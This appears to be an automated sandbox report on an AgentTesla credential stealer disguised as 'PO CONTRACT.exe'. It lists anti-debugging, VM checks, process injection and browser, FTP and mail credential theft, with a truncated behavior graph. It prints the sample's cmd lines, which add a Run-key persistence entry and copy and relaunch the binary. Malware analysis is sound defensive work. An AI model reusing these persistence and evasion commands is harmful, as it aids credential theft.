                    Source: C:\Windows\SysWOW64\SOA.exeMemory allocated: 6AE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeMemory allocated: 7AE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2F90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 30E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 50E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeMemory allocated: 2750000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeMemory allocated: 2960000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeMemory allocated: 4960000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeMemory allocated: E20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeMemory allocated: 2870000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeMemory allocated: 2660000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeWindow / User API: threadDelayed 796Jump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeWindow / User API: threadDelayed 371Jump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeWindow / User API: threadDelayed 792Jump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeWindow / User API: threadDelayed 8612Jump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exe TID: 7044Thread sleep time: -45000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exe TID: 596Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exe TID: 596Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\PING.EXE TID: 7656Thread sleep count: 34 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\PING.EXE TID: 7656Thread sleep time: -34000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\PING.EXE TID: 7524Thread sleep count: 41 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\PING.EXE TID: 7524Thread sleep time: -41000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\PING.EXE TID: 7724Thread sleep count: 41 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\PING.EXE TID: 7724Thread sleep time: -41000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exe TID: 7224Thread sleep time: -371000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exe TID: 3536Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exe TID: 3536Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exe TID: 7224Thread sleep time: -8612000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exe TID: 6048Thread sleep time: -50000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe TID: 1600Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe TID: 7656Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: PO CONTRACT.exe, 00000000.00000002.36008654605.0000000005747000.00000004.00000800.00020000.00000000.sdmp, PO CONTRACT.exe, 00000000.00000002.36011026094.0000000006900000.00000004.08000000.00040000.00000000.sdmp, PO CONTRACT.exe, 00000000.00000002.36008654605.00000000059D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VBoxTray
                    Source: PO CONTRACT.exe, 00000000.00000002.36008654605.00000000059D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 806010189GSOFTWARE\VMware, Inc.\VMware VGAuth
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeCode function: 0_2_05453070 CheckRemoteDebuggerPresent,0_2_05453070
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Injects a PE file into a foreign processes
                    Source: C:\Windows\SysWOW64\SOA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Windows\SysWOW64\SOA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 440000Jump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: FA5008Jump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 36 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "SOA" /t REG_SZ /d "C:\Windows\SysWOW64\SOA.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 43 > nul && copy "C:\Users\user\Desktop\PO CONTRACT.exe" "C:\Windows\SysWOW64\SOA.exe" && ping 127.0.0.1 -n 43 > nul && "C:\Windows\SysWOW64\SOA.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 36Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "SOA" /t REG_SZ /d "C:\Windows\SysWOW64\SOA.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 43Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 43Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\SOA.exe "C:\Windows\SysWOW64\SOA.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeQueries volume information: C:\Users\user\Desktop\PO CONTRACT.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeQueries volume information: C:\Windows\SysWOW64\SOA.exe VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeQueries volume information: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeQueries volume information: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 0.2.PO CONTRACT.exe.4044ef2.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.SOA.exe.401c15a.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.SOA.exe.3fe0f9a.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO CONTRACT.exe.5747378.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO CONTRACT.exe.3fceb62.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.SOA.exe.3fa5dca.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO CONTRACT.exe.4009d32.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.SOA.exe.3fe0f9a.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.SOA.exe.401c15a.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.SOA.exe.570c1d8.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO CONTRACT.exe.4044ef2.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.SOA.exe.570c1d8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO CONTRACT.exe.4009d32.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO CONTRACT.exe.3fceb62.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.SOA.exe.3fa5dca.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO CONTRACT.exe.5747378.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.40714268783.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.36008654605.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.37465940778.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.36005874246.0000000003F38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.36008654605.0000000005747000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.37462492550.0000000003F0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: PO CONTRACT.exe PID: 4388, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SOA.exe PID: 7300, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6732, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: Yara matchFile source: 0.2.PO CONTRACT.exe.4044ef2.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.SOA.exe.401c15a.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.SOA.exe.3fe0f9a.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO CONTRACT.exe.5747378.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO CONTRACT.exe.3fceb62.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.SOA.exe.3fa5dca.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO CONTRACT.exe.4009d32.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.SOA.exe.3fe0f9a.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.SOA.exe.401c15a.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.SOA.exe.570c1d8.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO CONTRACT.exe.4044ef2.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.SOA.exe.570c1d8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO CONTRACT.exe.4009d32.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO CONTRACT.exe.3fceb62.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.SOA.exe.3fa5dca.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO CONTRACT.exe.5747378.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.40714268783.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.36008654605.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.37465940778.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.36005874246.0000000003F38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.36008654605.0000000005747000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.37462492550.0000000003F0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.40717853751.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: PO CONTRACT.exe PID: 4388, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SOA.exe PID: 7300, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6732, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 0.2.PO CONTRACT.exe.4044ef2.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.SOA.exe.401c15a.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.SOA.exe.3fe0f9a.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO CONTRACT.exe.5747378.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO CONTRACT.exe.3fceb62.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.SOA.exe.3fa5dca.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO CONTRACT.exe.4009d32.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.SOA.exe.3fe0f9a.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.SOA.exe.401c15a.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.SOA.exe.570c1d8.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO CONTRACT.exe.4044ef2.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.SOA.exe.570c1d8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO CONTRACT.exe.4009d32.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO CONTRACT.exe.3fceb62.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.SOA.exe.3fa5dca.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO CONTRACT.exe.5747378.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.40714268783.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.36008654605.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.37465940778.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.36005874246.0000000003F38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.36008654605.0000000005747000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.37462492550.0000000003F0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: PO CONTRACT.exe PID: 4388, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SOA.exe PID: 7300, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6732, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire Infrastructure1
                    Valid Accounts                    		121
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    Valid Accounts                    		1
                    Valid Accounts                    		1
                    Deobfuscate/Decode Files or Information                    		1
                    Input Capture                    		24
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		Junk DataExfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt21
                    Registry Run Keys / Startup Folder                    		1
                    Access Token Manipulation                    		1
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		321
                    Security Software Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		SteganographyAutomated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook211
                    Process Injection                    		1
                    DLL Side-Loading                    		NTDS1
                    Process Discovery                    		Distributed Component Object Model1
                    Input Capture                    		Protocol ImpersonationTraffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                    Registry Run Keys / Startup Folder                    		121
                    Masquerading                    		LSA Secrets251
                    Virtualization/Sandbox Evasion                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Valid Accounts                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Modify Registry                    		DCSync1
                    Remote System Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    Access Token Manipulation                    		Proc Filesystem1
                    System Network Configuration Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt251
                    Virtualization/Sandbox Evasion                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron211
                    Process Injection                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                    Hidden Files and Directories                    		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1493192 Sample: PO CONTRACT.exe Startdate: 15/08/2024 Architecture: WINDOWS Score: 100 62 Found malware configuration 2->62 64 Malicious sample detected (through community Yara rule) 2->64 66 Multi AV Scanner detection for submitted file 2->66 68 7 other signatures 2->68 8 PO CONTRACT.exe 3 2->8         started        12 GUIVTme.exe 4 2->12         started        14 GUIVTme.exe 3 2->14         started        process3 file4 50 C:\Users\user\AppData\...\PO CONTRACT.exe.log, ASCII 8->50 dropped 70 Hides that the sample has been downloaded from the Internet (zone.identifier) 8->70 16 cmd.exe 3 8->16         started        20 cmd.exe 1 8->20         started        22 conhost.exe 12->22         started        24 conhost.exe 14->24         started        signatures5 process6 file7 46 C:\Windows\SysWOW64\SOA.exe, PE32 16->46 dropped 48 C:\Windows\SysWOW64\SOA.exe:Zone.Identifier, ASCII 16->48 dropped 56 Uses ping.exe to sleep 16->56 58 Drops executables to the windows directory (C:\Windows) and starts them 16->58 26 SOA.exe 2 16->26         started        29 conhost.exe 16->29         started        31 PING.EXE 1 16->31         started        33 PING.EXE 1 16->33         started        60 Uses ping.exe to check the status of other devices and networks 20->60 35 reg.exe 1 1 20->35         started        37 PING.EXE 1 20->37         started        40 conhost.exe 20->40         started        signatures8 process9 dnsIp10 72 Multi AV Scanner detection for dropped file 26->72 74 Machine Learning detection for dropped file 26->74 76 Writes to foreign 